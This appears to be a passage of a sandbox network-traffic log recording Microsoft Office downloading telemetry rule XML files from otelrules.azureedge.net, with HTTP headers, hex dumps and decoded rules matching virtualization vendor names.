                                                        2024-11-12 15:27:10 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        78192.168.2.64980613.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:10 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:10 UTC491INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:10 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 419
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                        ETag: "0x8DC582BB7F164C3"
                                                        x-ms-request-id: cd5b73c9-701e-0098-1e09-2d395f000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152710Z-16547b76f7fmbrhqhC1DFWkds80000000ft000000000hfve
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        X-Cache-Info: L1_T2
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:10 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        79192.168.2.64980713.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:10 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:10 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:10 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 477
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                        ETag: "0x8DC582BA48B5BDD"
                                                        x-ms-request-id: ad558c98-c01e-0082-6ea0-34af72000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152710Z-15869dbbcc6lq45jhC1DFWtecs00000001h000000000ckdx
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:10 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        80192.168.2.64980813.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:10 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:11 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:11 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 419
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                        ETag: "0x8DC582B9FF95F80"
                                                        x-ms-request-id: 29e284b5-001e-0065-5703-2d0b73000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152711Z-16547b76f7fkj7j4hC1DFW0a9g0000000ftg00000000c6x0
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:11 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        81192.168.2.64980913.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:11 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:11 UTC491INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:11 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 472
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                        ETag: "0x8DC582BB650C2EC"
                                                        x-ms-request-id: 57b0571f-501e-00a3-7dfb-2cc0f2000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152711Z-16547b76f7fdf69shC1DFWcpd00000000frg00000000chfm
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache-Info: L1_T2
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:11 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        82192.168.2.64981013.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:11 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:11 UTC491INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:11 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 468
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                        ETag: "0x8DC582BB3EAF226"
                                                        x-ms-request-id: 06fd63be-801e-008f-5e01-2d2c5d000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152711Z-16547b76f7fknvdnhC1DFWxnys0000000fu000000000g5b3
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        X-Cache-Info: L1_T2
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:11 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        83192.168.2.64981113.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:11 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:11 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:11 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 485
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                        ETag: "0x8DC582BB9769355"
                                                        x-ms-request-id: 9ba15ece-101e-0034-5d08-2c96ff000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152711Z-16547b76f7fj897nhC1DFWdwq40000000fng00000000fgcw
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:11 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        84192.168.2.64981213.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:11 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:11 UTC491INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:11 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 411
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                        ETag: "0x8DC582B989AF051"
                                                        x-ms-request-id: 1572e0e4-b01e-003e-1a0c-2d8e41000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152711Z-16547b76f7f7scqbhC1DFW0m5w0000000fk000000000m2z9
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        X-Cache-Info: L1_T2
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:11 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        85192.168.2.64981313.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:11 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:11 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:11 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 470
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                        ETag: "0x8DC582BBB181F65"
                                                        x-ms-request-id: 6ba2c7e5-f01e-0071-65a3-34431c000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152711Z-15869dbbcc65c582hC1DFWgpv400000009q0000000007mks
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:11 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        86192.168.2.64981413.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:11 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:11 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:11 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 427
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                        ETag: "0x8DC582BB556A907"
                                                        x-ms-request-id: d55876ee-301e-0099-5603-2d6683000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152711Z-16547b76f7fwvr5dhC1DFW2c940000000fpg00000000gazh
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:11 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        87192.168.2.64981513.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:12 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:12 UTC470INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:12 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 502
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                        ETag: "0x8DC582BB6A0D312"
                                                        x-ms-request-id: 53ebd79e-c01e-0046-4ea1-342db9000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152712Z-17df447cdb5vp9l9hC1DFW5hw800000007sg00000000c2wg
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        Accept-Ranges: bytes
                                                        2024-11-12 15:27:12 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        88192.168.2.64981613.107.246.45443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:27:12 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept-Encoding: gzip
                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                        Host: otelrules.azureedge.net
                                                        2024-11-12 15:27:12 UTC491INHTTP/1.1 200 OK
                                                        Date: Tue, 12 Nov 2024 15:27:12 GMT
                                                        Content-Type: text/xml
                                                        Content-Length: 407
                                                        Connection: close
                                                        Cache-Control: public, max-age=604800, immutable
                                                        Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                        ETag: "0x8DC582B9D30478D"
                                                        x-ms-request-id: 71d80149-801e-0083-3cb0-34f0ae000000
                                                        x-ms-version: 2018-03-28
                                                        x-azure-ref: 20241112T152712Z-15869dbbcc6kg5mvhC1DFW39vn0000000690000000007qp7
                                                        x-fd-int-roxy-purgeid: 0
                                                        X-Cache: TCP_HIT
                                                        X-Cache-Info: L1_T2
                                                        Accept-Ranges: bytes
